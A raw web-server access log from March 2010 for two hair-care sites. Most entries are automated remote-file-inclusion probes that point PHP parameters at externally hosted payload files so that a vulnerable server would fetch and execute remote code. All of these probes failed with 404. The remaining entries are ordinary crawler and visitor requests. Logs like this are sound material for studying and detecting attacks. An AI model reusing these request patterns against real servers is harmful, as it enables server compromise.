87.106.132.3 - - [01/Mar/2010:15:08:09 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:08:09 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.240.113.151 - - [01/Mar/2010:15:09:05 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
77.240.113.151 - - [01/Mar/2010:15:09:05 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:09:07 -0800] "GET /logs//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:09:07 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:09:07 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:11:51 -0800] "GET //bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:11:51 -0800] "GET /logs/access_100125.log%20%20///bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:11:51 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:12:28 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:12:28 -0800] "GET //bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:12:28 -0800] "GET /logs/access_100125.log%20%20///bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:13:22 -0800] "GET /delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:13:22 -0800] "GET /logs//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:13:22 -0800] "GET /logs/access.log%20%20//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:13:39 -0800] "GET //bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:13:39 -0800] "GET /logs/access_100125.log%20%20///bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:13:39 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:14:37 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [01/Mar/2010:15:15:05 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14314 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:15:17:42 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:15:17:42 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:15:17:43 -0800] "GET /logs/access_100111.log//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:18:13 -0800] "GET /delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:18:13 -0800] "GET /logs/access.log%20%20//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:18:13 -0800] "GET /logs//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [01/Mar/2010:15:18:45 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13489 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:18:47 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:18:47 -0800] "GET /logs//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:18:47 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:19:00 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:19:00 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:19:00 -0800] "GET /logs//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:19:04 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:19:05 -0800] "GET /logs//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:19:05 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:19:27 -0800] "GET /delete_comment.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:19:28 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:19:28 -0800] "GET /logs//delete_comment.php?board_skin_path=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:19:28 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:19:28 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:19:28 -0800] "GET /logs//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:19:38 -0800] "GET /errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:19:38 -0800] "GET /logs//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:19:38 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:19:50 -0800] "GET /logs/access.log//delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:19:55 -0800] "GET /logs//delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:20:00 -0800] "GET /delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [01/Mar/2010:15:20:32 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13262 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:21:06 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:21:23 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:21:32 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:21:52 -0800] "GET /logs/access.log%20%20//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:21:52 -0800] "GET /delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:21:52 -0800] "GET /logs//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:22:48 -0800] "GET /logs/access.log%20%20//delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:22:48 -0800] "GET /delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.214.45.105 - - [01/Mar/2010:15:22:49 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.freehairsecrets.com"
91.214.45.105 - - [01/Mar/2010:15:22:49 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:22:53 -0800] "GET /logs//delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:15:23:14 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:23:16 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:23:31 -0800] "GET /logs/access.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:23:37 -0800] "GET /logs/access.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.115.6.13 - - [01/Mar/2010:15:23:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:23:58 -0800] "GET /logs/access.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:24:24 -0800] "GET /logs/access_100118.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:24:35 -0800] "GET /logs/access_100118.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:24:47 -0800] "GET /logs/access_100118.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:25:59 -0800] "GET /logs/access_100125.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [01/Mar/2010:15:26:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
87.106.132.3 - - [01/Mar/2010:15:26:14 -0800] "GET /logs/access_100125.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [01/Mar/2010:15:26:23 -0800] "GET /logs/access_100125.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [01/Mar/2010:15:26:24 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20450 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
220.181.94.229 - - [01/Mar/2010:15:26:34 -0800] "GET /freehairsecretsphp/viewtopic.php?p=3416 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:26:43 -0800] "GET /delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:26:43 -0800] "GET /logs//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:26:44 -0800] "GET /logs/access.log%20%20//delete_comment.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.131.30.149 - - [01/Mar/2010:15:28:09 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14717 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:15:31:04 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:33:42 -0800] "GET /logs/access.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:15:33:47 -0800] "GET /logs/access.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:15:34:48 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:34:48 -0800] "GET /logs/access_100111.log//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:34:49 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:34:49 -0800] "GET /logs/access_100118.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.152.132 - - [01/Mar/2010:15:34:55 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:15:34:55 -0800] "GET /logs/access_100118.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.152.132 - - [01/Mar/2010:15:34:56 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.15.152.132 - - [01/Mar/2010:15:34:56 -0800] "GET /logs/access.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:15:35:33 -0800] "GET /logs/access_100111.log//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:35:33 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:35:33 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:36:09 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:36:09 -0800] "GET /logs/access_100111.log//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:36:09 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:36:56 -0800] "GET /logs/access_100125.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:15:37:01 -0800] "GET /logs/access_100125.log//errors.php?error=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:37:13 -0800] "GET /delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:37:13 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:15:37:17 -0800] "GET /logs//delete_all.php?DOCUMENT_ROOT=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:39:27 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:39:27 -0800] "GET /logs/access_100111.log//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:15:39:27 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.193.235.67 - - [01/Mar/2010:15:41:43 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7725 HTTP/1.1" 200 349 "http://de.search.yahoo.com/search?p=REAL+AMATEUR+TUBE&ei=UTF-8&rd=r1&fr=yfp-t-708&xargs=0&pstart=1&b=691" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "growlonghairfast.com"
93.193.235.67 - - [01/Mar/2010:15:41:43 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "growlonghairfast.com"
66.249.65.55 - - [01/Mar/2010:15:46:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
208.115.111.248 - - [01/Mar/2010:15:54:32 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
77.240.113.151 - - [01/Mar/2010:15:58:02 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
77.240.113.151 - - [01/Mar/2010:15:58:02 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:01:02 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:01:02 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:01:02 -0800] "GET /logs/access.log%20%20//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:02:19 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:02:20 -0800] "GET /logs/access.log%20%20//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:02:20 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:04:16 -0800] "GET /delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:04:16 -0800] "GET /logs/access.log%20%20//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.193.152 - - [01/Mar/2010:16:04:16 -0800] "GET /logs//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.54 - - [01/Mar/2010:16:05:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
219.94.193.152 - - [01/Mar/2010:16:07:19 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
